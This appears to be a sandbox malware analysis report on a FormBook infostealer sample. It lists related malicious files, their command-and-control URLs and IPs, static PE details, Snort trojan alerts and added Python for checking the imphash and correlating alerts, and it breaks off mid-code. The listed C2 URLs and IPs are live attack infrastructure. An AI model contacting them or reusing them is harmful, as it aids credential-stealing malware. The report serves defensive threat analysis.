8nxKYwJna8.exe | malicious | www.treningi-enduro.com/csv8/?OjKL3=zMci1XF7kcEgJbB0bxSLkx3uOQBO7DjFCctU3OhNTvbnisOmfQ6emD2pBeYu1j12S2p0&UT=EhUhb4
Xi4vVgHekF.exe | malicious | www.newfacesatv.info/rina/?GFQL=ppFJhxZ/poTzDSMGT1HJyUg3NUxhm/dyZyRA539kIehONzPOa9y11HW9paxI3u+DZB07&wFN0DX=UtX8E
hkcmd.exe | malicious | www.glasshouseroadtrip.com/bw82/?FVWl=9eHfuSy8brijEHIT/UcXOob2js7MmdckS75F0dqz3qUWn12LybLAq7i0VaJ0F4L4tdVU&AlO=O2MtmfRxc
2Debit Note_OwnersInvoices.exe | malicious | www.kazancsere.net/ivay/?NrQLEP=D48x&1bz=aaBEw9Yir1+hkeWoWLH1LjL9H2PhIHEM/4MpJ31it9FOz57KTCmY8+Kffl97ACZ0KQ0a
YWrrcqVAno.exe | malicious | www.glasshouseroadtrip.com/bw82/?u8iLW=9eHfuSy8brijEHIT/UcXOob2js7MmdckS75F0dqz3qUWn12LybLAq7i0VaJ0F4L4tdVU&OhNhA=9rUlSVPXQJJ
j64eIR1IEK.exe | malicious | www.treningi-enduro.com/csv8/?Bz=zMci1XF7kcEgJbB0bxSLkx3uOQBO7DjFCctU3OhNTvbnisOmfQ6emD2pBeYu1j12S2p0&R0G=dhrxP2v88TRtsx
Order confirmation 64236000000025 26.01.2021.exe | malicious |
                                                              • www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH
                                                              D6mimHOcsr.exeGet hashmaliciousBrowse
                                                              • www.wmarquezy.com/bw82/?7n=/EPqbtSCMBudkSBZRYE1urAc3bDaNMBRSmi9VqH/YEA51Bpt3rASv6f17YS9KDr+Saej&RZ=Y4C4ZlKPDRhPDXy
                                                              r.exeGet hashmaliciousBrowse
                                                              • www.andrewsreadingjournal.com/uds2/?_jPlXT=HdLSVyUFGLZERDc21vAze+eEMrorFA8CuNZ+YPXMfnOMoW52wWx899FazcdJxWS7BsXFqvIALA==&n4=iN68RdPpj
                                                              yxYmHtT7uT.exeGet hashmaliciousBrowse
                                                              • www.treningi-enduro.com/csv8/?Aro=zMci1XF7kcEgJbB0bxSLkx3uOQBO7DjFCctU3OhNTvbnisOmfQ6emD2pBd0U2iZNRBIldZSbhw==&EHU40X=gbWtoXjpHB
                                                              142.250.185.179orders.exeGet hashmaliciousBrowse
                                                              • www.apollovia.com/ni6e/?W6=v2jPPKbuW0OQGz4sr1wZQDMPp20CFggp8t94yVUJyg4jQj+DNzGPVR/b/eiBo+fiU7a34C4+xg==&UlPt=GVoxsVvHVpd8Sl
                                                              vB1Zux02Zf.exeGet hashmaliciousBrowse
                                                              • www.nikolaichan.com/bw82/?9rn=Ch2H98AXZPNlB&jH5XY=nYWM/rwSzX9MyPPoZtrUCAZuUhwRv7E+HNbrnomLB0MgbyAj2S+JrZFjkPtrBRYAKM0rV+KW/g==
                                                              34.102.136.180orders.exeGet hashmaliciousBrowse
                                                              • www.suncobrayoga.com/ni6e/?W6=+pZLjlAoRu3DtzXq35lSkEUB/ZsZHJe08VokdK2HVDHLsmWw5RNCvrmnDtoZrYQiiN4bm+0CXw==&UlPt=GVoxsVvHVpd8Sl
                                                              Order List - 022321-xlxs.exeGet hashmaliciousBrowse
                                                              • www.hk-attorneys.com/uqf5/?Y4pXFx5x=Dg97rDlyoxn6rzyVbv3B7zG329WThiiFJjF/QU5oHVDRmmZSVK6c1XVEPf5rJpTqyNbYXr1Rqw==&BR-=UTjHnDN0Jp9hlD
                                                              9VZe9OnL4V.exeGet hashmaliciousBrowse
                                                              • www.vio-lence-official.com/mjs/?ohoDP=Szrhs8&EzrxBfhH=Km50rYfCIMLkr6cNBQUAIfaJzg7DBzOfrqOCbjSFoXRiVQSa2PRHXyZRZ9uV6+yeKg7N
                                                              3zutY8IPBS.exeGet hashmaliciousBrowse
                                                              • www.chapelcouture.com/ffw/?uZCX=XPjPaXeHqZ5XiDl&Jzr8URRX=Q3EGYcSU8t2GK6ftjW66hePdz5cilHQXw0NtnM1D8Yj3A1BwaX/+ESmEZzWdZeCCWyTt
                                                              IKtgCGdzlg.exeGet hashmaliciousBrowse
                                                              • www.srcsvcs.com/bw82/?9rjHF6y=idg9JX97F3eVuJ82V/BLVAmaLrIGTHqm4FsH2lIA1Y64HTHcmGyQxV9x71/09hThPInxOEDyHA==&lX9d=p48hVnrp1tqPRT7P
                                                              U6RI0SDRS2.exeGet hashmaliciousBrowse
                                                              • www.wholesalerbargains.com/nsag/?GVgT1=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU4mnryJvfB01hf9UaA==&6l=SlSp
                                                              Upit za narud#U00c5#U00bebinu 02242021.PDFxx.exeGet hashmaliciousBrowse
                                                              • www.theliveshoppingexpo.com/nang/?jPI0=Knh8&txo8nz-=S4xOVIVtHeyPueihJCJoAgs1xKTbprsh/R6+EFDKAdYqsBA5xTBg6oeDaqwim7e1l7ecSZoRyw==
                                                              vB1Zux02Zf.exeGet hashmaliciousBrowse
                                                              • www.gallerybrows.com/bw82/?jH5XY=qtQC6ueLh9SPHvPoeB2W7XMv4DHg8NEty8uJPphl3NdNxxbo+oCUuV5k464D184/Ry1q3SvWwA==&9rn=Ch2H98AXZPNlB
                                                              transferir copia_98087.exeGet hashmaliciousBrowse
                                                              • www.shroomsdrop.com/8zdn/?kH=eGnYEUgg+wSQcZ375yCgdfFf6E1Kt+cpyPOB6e9JmwPPtBsaC8CQtumAL6bFnIfy9ObU&Bld=UVCtYPUHlPSP
                                                              cryptedprof.exeGet hashmaliciousBrowse
                                                              • www.thatlocaljawn.com/rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk
                                                              MT OCEAN STAR ISO 8217 2005.xlsxGet hashmaliciousBrowse
                                                              • www.hattonpalacejewellery.com/67d/?cDK=W2Z2UcqSFcwA3YJY0Xi1zX0akAe1ObC272eZaT9vn/sHgfwkHiKnNOLEeBBq/HqgrL2ZGA==&PBR=dpddZ
                                                              0O9BJfVJi6fEMoS.exeGet hashmaliciousBrowse
                                                              • www.fertinvitro.doctor/uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX
                                                              Payment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                                                              • www.sweetpopntreatz.com/blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L
                                                              lpdKSOB78u.exeGet hashmaliciousBrowse
                                                              • www.havemercyinc.net/4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha
                                                              vBugmobiJh.exeGet hashmaliciousBrowse
                                                              • www.activagebenefits.net/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsI
                                                              ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                              • www.softwaresreports.info/owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src
                                                              NewOrder.xlsmGet hashmaliciousBrowse
                                                              • www.covidwatcharizona.com/tub0/?azuxWju=dEK3j7mWBeQXl2zlSZSqDcFEW4EdlZEYoS0+mEVRU2HuA7A7T/ky1yECx94kGVXSwos3qg==&0dt=YtdhwPcHS
                                                              Order_20180218001.exeGet hashmaliciousBrowse
                                                              • www.houstoncouplesexpert.com/seon/?EJBpf8l=ojsb3jKq/XKh64QU9jx/ITCiT4+67gOjnvEpe+kxWJrzMHvdGcv1c3rSoEz5gk4FhTBQ&kDKHiZ=QFNTw2k
                                                              22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                              • www.rizrvd.com/bw82/?RFQx_=AJ+QNFfsTFGsedRB1oQHABBFVni950JEMBOKAlzmtW9JOrHkbqbPAoxgnlDKI2ECKqRl+w==&GZopM=kvuD_XrpiP
                                                              ORDER LIST.xlsxGet hashmaliciousBrowse
                                                              • www.speedysnacksbox.com/4qdc/?jpaha=oetlJbtkpt9RC07gzGtc819EDOSw/wKhNDKeGQ7agYbSWM8ZAAA074MmVo5ceZhU2bos5Q==&3fz=fxopBn3xezt4N4a0

Domains

Columns: Match; Associated Sample Name / URL; SHA 256; Detection; Link; Context
Match: HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
0O9BJfVJi6fEMoS.exe (malicious)
• 3.223.115.185
lpdKSOB78u.exe (malicious)
• 3.223.115.185
Order_20180218001.exe (malicious)
• 3.223.115.185
IMG_01670_Scanned.doc (malicious)
• 3.223.115.185
shed.exe (malicious)
• 3.223.115.185
IMG_7189012.exe (malicious)
• 3.223.115.185
Shinshin Machinery.exe (malicious)
• 3.223.115.185
DHL Shipment Notification 7465649870.pdf.exe (malicious)
• 3.223.115.185
InterTech_Inquiry.exe (malicious)
• 3.223.115.185
urBYw8AG15.exe (malicious)
• 3.223.115.185
fuS9xa8nq6.exe (malicious)
• 3.223.115.185
MV SEIYO FORTUNE REF 27 - QUOTATION.xlsx (malicious)
• 3.223.115.185
executable.2772.exe (malicious)
• 3.223.115.185
PO-098907654467.xlsx (malicious)
• 3.223.115.185
Docs.exe (malicious)
• 3.223.115.185
Vghj5O8TF2rYH85.exe (malicious)
• 3.223.115.185
SecuriteInfo.com.generic.ml.exe (malicious)
• 3.223.115.185
DOC_KDB_06790-80.xlsx (malicious)
• 3.223.115.185
IRS_Microsoft_Excel_Document_xls.jar (malicious)
• 3.223.115.185
RFQ.# PO41000202103.exe (malicious)
• 3.223.115.185
Match: ghs.googlehosted.com
orders.exe (malicious)
• 142.250.185.179
vB1Zux02Zf.exe (malicious)
• 142.250.185.179
RFQ.exe (malicious)
• 142.250.185.179
YSZiV5Oh2E.exe (malicious)
• 216.58.206.51
HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exe (malicious)
• 142.250.180.179
aUWqpYqmXT.exe (malicious)
• 142.250.179.147
2021_036,pdf.exe (malicious)
• 172.217.20.243
P.O 5282.exe (malicious)
• 172.217.20.243
Details.exe (malicious)
• 172.217.20.243
QgWarCS5Z4.exe (malicious)
• 172.217.20.243
attach-563539606.xls (malicious)
• 172.217.20.243
30 percento,pdf.exe (malicious)
• 172.217.20.243
wl0mBiXkW1.exe (malicious)
• 216.58.207.179
PR Agreement FEB2021.xlsx (malicious)
• 216.58.207.179
Purchase#Order_BC012356.pdf.exe (malicious)
• 216.58.207.179
DHL eShipment invoice_pdf.exe (malicious)
• 216.58.207.179
vt5WM7St45.exe (malicious)
• 216.58.207.147
KROS Sp. z.o.o.exe (malicious)
• 216.58.207.179
NsNu725j8o.exe (malicious)
• 172.217.17.147
R85exvLDws.rtf (malicious)
• 172.217.17.147

ASN

Columns: Match; Associated Sample Name / URL; SHA 256; Detection; Link; Context
Match: CLOUDFLARENETUS
k_cr.dll (malicious)
• 104.20.184.68
orders.exe (malicious)
• 172.67.129.33
PO No. 2995_pdf.exe (malicious)
• 172.67.172.17
NEW ORDER.exe (malicious)
• 172.67.172.17
9VZe9OnL4V.exe (malicious)
• 23.227.38.74
CN-Invoice-XXXXX9808-19011143287993.exe (malicious)
• 172.67.172.17
payment confirmation 0029175112.exe (malicious)
• 172.67.172.17
Payment Advise_pdf.exe (malicious)
• 104.21.71.230
Drawing No 2000168004_pdf.exe (malicious)
• 172.67.172.17
PO_210224.exe (malicious)
• 104.21.34.214
GTS_21_9018_ORDER_pdf.exe (malicious)
• 172.67.172.17
FOB offer_1164087223_I0133P2100363812.PDF.exe (malicious)
• 104.21.19.200
Telex Transfer.exe (malicious)
• 104.21.19.200
DHL Shipping Documents PO1001910 .exe (malicious)
• 172.67.188.154
Purchase Order KV_RQ-7436819.doc (malicious)
• 104.21.71.230
lVDGaDH.dll (malicious)
• 104.20.184.68
PRODUCT ENQUIRY ( 21001025 ) PART NO EPN518.exe (malicious)
• 172.67.188.154
HUIBAO PROFORMA INVOICE 07092021.pdf.exe (malicious)
• 104.21.19.200
Attach_1760138734_477205649.xls (malicious)
• 104.22.18.188
551UmZ61Ts.exe (malicious)
• 1.3.21.169
Match: NETLABFR
CCMA Case GAJB00138471-21.pdf.exe (malicious)
• 45.153.203.81
INV_PR2201.docm (malicious)
• 45.153.203.55
Proof of Payment_DLMV2S6G.pdf.exe (malicious)
• 45.153.203.81
dwg.exe (malicious)
• 45.153.203.33
Quote#20210914.xls (malicious)
• 45.153.203.54
Quote#20210914.xls (malicious)
• 45.153.203.54
SecuriteInfo.com.Generic.mg.9829d2aa6885c690.exe (malicious)
• 45.153.203.134
invoice.xls (malicious)
• 45.153.203.134
dwg.exe (malicious)
• 45.153.203.134
http://45.153.203.222 (malicious)
• 45.153.203.222
file.exe (malicious)
• 45.153.203.141
Completed Finance Application and Required Documents.DOC.exe (malicious)
• 45.153.203.141
Product_item.exe (malicious)
• 45.153.203.141
gunzipped.exe (malicious)
• 45.153.203.141
Payment Advice - Advice RefGLVA05109502 .PDF.exe (malicious)
• 45.153.203.141
Notification from SARS, Defaulter letter.PDF.exe (malicious)
• 45.153.203.141
file.exe (malicious)
• 45.153.203.141
Match: AUTOMATTICUS
IKtgCGdzlg.exe (malicious)
• 192.0.78.25
22 FEB -PROCESSING.xlsx (malicious)
• 192.0.78.25
unmapped_executable_of_polyglot_duke.dll (malicious)
• 192.0.84.247
AWB-INVOICE_PDF.exe (malicious)
• 192.0.78.24
IMG_7742_Scanned.doc (malicious)
• 192.0.78.25
D6ui5xr64I.exe (malicious)
• 192.0.78.25
AgroAG008021921doc_pdf.exe (malicious)
• 192.0.78.24
P.O-48452689535945.exe (malicious)
• 192.0.78.24
CMahQwuvAE.exe (malicious)
• 192.0.78.24
c4p1vG05Z8.exe (malicious)
• 192.0.78.24
zMJhFzFNAz.exe (malicious)
• 192.0.78.24
kgozmovHpY.exe (malicious)
• 192.0.78.24
9j4sD6PmsW.exe (malicious)
• 192.0.78.25
ransomware.exe (malicious)
• 192.0.78.12
po.exe (malicious)
• 192.0.78.25
SKMBT_C280190724010211.exe (malicious)
• 192.0.78.25
ZRz0Aq1Rf0.dll (malicious)
• 192.0.78.12
FEB_2021.EXE (malicious)
• 192.0.78.25
PvvkzXgMjG.exe (malicious)
• 192.0.78.24
Doc_87215064.htm (malicious)
• 192.0.76.3

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 5.73680598005326
TrID:
• Win32 Executable (generic) a (10002005/4) 99.15%
• Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: dwg.exe
File size: 98304 bytes
MD5: 92628cc54ad5d8ffed4f28f9bf9f80f8
SHA1: 586c6da770b640a04ad9f5d205308f5a2f84e42b
SHA256: 6e6fa2f1d1b7e3c37b6c7a18a4bd750e6ca980741c87af931c17d2ed7e469c3e
SHA512: 4464a4cc1b30cc40448a74ec6edc960c313a4e21c73ea74630719218927890eefbe5a8b804a45258fda23a490bde553fad7ff2dcc8cf39666afb787ab13cc741
SSDEEP: 1536:CbLxrswd2n+CUh7PPmfgvu9EYdIrR8mnPORHOmlKmbL:mLBk+fPj4hIrZnPWuEL
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L.....{O.................0...P......H........@....@

                                                              File Icon

                                                              Icon Hash:10b0b2095489f81e

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x401348
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                              DLL Characteristics:
                                                              Time Stamp:0x4F7B9985 [Wed Apr 4 00:44:53 2012 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:c6ebaa5f331077d9c6c3ae892d7a39ce

Entrypoint Preview

The first two instructions (push 0040428Ch; call ...) are the standard Visual Basic 6 entry stub: push the address of the VB project header and call into the MSVBVM60 runtime (ThunRTMain). Everything after the call is the disassembler decoding data, not code. For example, the run shown as dec esi, inc ebp, push esp, push esi, push edx, dec ebx, inc edx, dec edi, dec esp, push ebx, dec edx is the byte sequence 4E 45 54 56 52 4B 42 4F 4C 53 4A, the ASCII string NETVRKBOLSJ that also appears as ProductName in the version information below.

Instruction
push 0040428Ch
call 00007F95DCE99025h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx+294CC6F7h], ch
int3
out 46h, al
mov eax, dword ptr [30A90AA4h]
jmp 00007F95DCEA89B9h
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esi
inc ebp
push esp
push esi
push edx
dec ebx
inc edx
dec edi
dec esp
push ebx
dec edx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
and byte ptr [ecx+263365ABh], cl
fsubp st(7), st(0)
dec edx
and dword ptr [esi-25h], 4EBB4744h
leave
sbb dword ptr [ecx-7BF2A973h], esp
imul eax, dword ptr [ebx-6Bh], 2Dh
out E7h, eax
in eax, dx
sbb esi, dword ptr [esi-0Bh]
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and ch, byte ptr [esi]
add byte ptr [eax], al
clc
daa
add byte ptr [eax], al
add byte ptr [616E6100h], cl
arpl word ptr [ecx+6Dh], sp
jo 00007F95DCE990A6h
imul esp, dword ptr [ebx+61h], 0D006C6Ch
add dword ptr [esi], ecx
add byte ptr [esi+6Fh], cl

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x13724 | 0x3c | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x2c76 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x238 | 0x30 | (in the PE headers, before the first section at 0x1000)
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xd8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x12b34 | 0x13000 | False | 0.443860505757 | data | 6.26332938402 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x14000 | 0x19cc | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x16000 | 0x2c76 | 0x3000 | False | 0.409830729167 | data | 4.50318528506 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

The Type column is a libmagic guess over the raw resource bytes; the "dBase IV DBT" and "GLS_BINARY_LSB_FIRST" labels on RT_ICON entries are misidentifications of icon bitmap data, not evidence of embedded database files.

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x17dce | 0xea8 | data | |
RT_ICON | 0x17526 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 2763565, next used block 3552051 | |
RT_ICON | 0x16fbe | 0x568 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x16cd6 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 3207626755, next used block 12467 | |
RT_ICON | 0x16bae | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x16546 | 0x668 | data | |
RT_GROUP_ICON | 0x164ec | 0x5a | data | |
RT_VERSION | 0x161e0 | 0x30c | data | Chinese | China

Imports

DLL | Import
USER32.DLL | HideCaret
MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj
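Two numbers in the static tables above can be recomputed from what is printed here rather than taken on trust: the Import Hash is the MD5 of the normalised import list (the pefile get_imphash() convention, module name lowercased with its .dll/.ocx/.sys suffix dropped, function lowercased, entries joined with commas), and the Entropy column is Shannon entropy over a section's raw bytes. The Python below is an added example, not part of the Joe Sandbox report. It assumes the imports are listed in the file's import-directory order and that none is imported by ordinal (imphash is order-sensitive, so a value different from c6ebaa5f331077d9c6c3ae892d7a39ce means one of those assumptions does not hold), and that the report's Entropy is in bits per byte, which fits .data showing 0.0 over 0x1000 raw bytes, i.e. a section that is one repeated byte value on disk. REPORTED_IMPHASH is simply the value copied from the report.

```python
import hashlib
import math
from collections import Counter
from typing import List, Tuple

# Import table as printed in the report, in the order the report lists it.
# Assumption: this is the file's real import-directory order; imphash depends on it.
IMPORTS: List[Tuple[str, List[str]]] = [
    ("USER32.DLL", ["HideCaret"]),
    ("MSVBVM60.DLL", [
        "_CIcos", "_adj_fptan", "__vbaVarMove", "__vbaFreeVar", "__vbaStrVarMove",
        "__vbaFreeVarList", "_adj_fdiv_m64", "__vbaFreeObjList", "_adj_fprem1",
        "__vbaSetSystemError", "__vbaHresultCheckObj", "_adj_fdiv_m32", "__vbaObjSet",
        "_adj_fdiv_m16i", "_adj_fdivr_m16i", "_CIsin", "__vbaChkstk", "EVENT_SINK_AddRef",
        "__vbaStrCmp", "_adj_fpatan", "__vbaLateIdCallLd", "EVENT_SINK_Release", "_CIsqrt",
        "EVENT_SINK_QueryInterface", "__vbaExceptHandler", "_adj_fprem", "_adj_fdivr_m64",
        "__vbaFPException", "_CIlog", "__vbaNew2", "_adj_fdiv_m32i", "_adj_fdivr_m32i",
        "__vbaStrCopy", "__vbaFreeStrList", "_adj_fdivr_m32", "_adj_fdiv_r", "__vbaI4Var",
        "__vbaVarDup", "_CIatan", "__vbaStrMove", "_allmul", "_CItan", "_CIexp",
        "__vbaFreeStr", "__vbaFreeObj",
    ]),
]

# Value copied from the report's "Import Hash" field, used only for comparison.
REPORTED_IMPHASH = "c6ebaa5f331077d9c6c3ae892d7a39ce"


def imphash_parts(imports: List[Tuple[str, List[str]]]) -> List[str]:
    """Normalise each import to 'module.function' the way pefile's get_imphash() does:
    module lowercased with a trailing .dll/.ocx/.sys removed, function name lowercased.
    Imports by ordinal are not handled here (pefile would emit 'ordNNN' for them)."""
    parts: List[str] = []
    for dll, funcs in imports:
        mod = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if mod.endswith(ext):
                mod = mod[: -len(ext)]
                break
        parts.extend(f"{mod}.{f.lower()}" for f in funcs)
    return parts


def imphash(imports: List[Tuple[str, List[str]]]) -> str:
    """MD5 hex digest over the comma-joined normalised import list."""
    return hashlib.md5(",".join(imphash_parts(imports)).encode("ascii")).hexdigest()


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


if __name__ == "__main__":
    computed = imphash(IMPORTS)
    print(f"imphash from listed imports: {computed}")
    print(f"report value:                {REPORTED_IMPHASH}  match={computed == REPORTED_IMPHASH}")
    # The report gives .data an entropy of 0.0 over 0x1000 raw bytes: every byte on disk is identical.
    print("entropy of 0x1000 zero bytes:", shannon_entropy(bytes(0x1000)))
    print("entropy of 256 distinct bytes:", shannon_entropy(bytes(range(256))))
```

If the computed hash does not match, do not assume the report is wrong: the usual causes are an import the report does not show by name (the VB6 runtime entry is often imported by ordinal) or a listing order that differs from the import directory. Run pefile against the sample itself to settle it.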

Version Infos

Description | Data
Translation | 0x0804 0x04b0 (language ID 0x0804 is Chinese, Simplified, PRC; code page 0x04b0 is 1200, Unicode. This field is what the "Possible Origin" entry below is derived from.)
LegalCopyright | Internal Verify Number,88
InternalName | radikalitete
FileVersion | 1.00
CompanyName | Internal Verify Number,88
LegalTrademarks | Internal Verify Number,88
ProductName | NETVRKBOLSJ
ProductVersion | 1.00
OriginalFilename | radikalitete.exe

Possible Origin

Language of compilation system | Country where language is spoken
Chinese | China

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/24/21-09:54:12.190743 | TCP | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49719 | 80 | 192.168.2.3 | 45.153.203.193
02/24/21-09:54:57.474005 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49726 | 80 | 192.168.2.3 | 104.18.194.20
02/24/21-09:54:57.474005 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49726 | 80 | 192.168.2.3 | 104.18.194.20
02/24/21-09:54:57.474005 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49726 | 80 | 192.168.2.3 | 104.18.194.20
02/24/21-09:55:13.924908 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
02/24/21-09:55:16.956145 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
02/24/21-09:55:23.618812 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49739 | 34.102.136.180 | 192.168.2.3
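The alert sequence above is the loader-then-stealer pattern worth alerting on as a whole rather than rule by rule: a .bin stage fetched from a bare IP (SID 2018752), and about 45 seconds later the three FormBook check-in rules (2031412, 2031449, 2031453) firing on one GET from the same host. The Python below is an added correlation example, not Joe Sandbox code; it runs over the seven rows of this table, re-typed inline as constructed pipe-delimited records, and pairs each stage-download alert with the first later check-in from the same internal host. The SID groupings, the ten-minute window and the 192.168. internal prefix are assumptions made for this example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Set


@dataclass(frozen=True)
class Alert:
    ts: datetime
    proto: str
    sid: int
    msg: str
    sport: Optional[int]
    dport: Optional[int]
    src: str
    dst: str


def parse_alert(line: str) -> Alert:
    """Parse one pipe-delimited row (the layout used for the constructed input below)."""
    ts, proto, sid, msg, sport, dport, src, dst = [f.strip() for f in line.split("|")]
    return Alert(
        ts=datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"),
        proto=proto,
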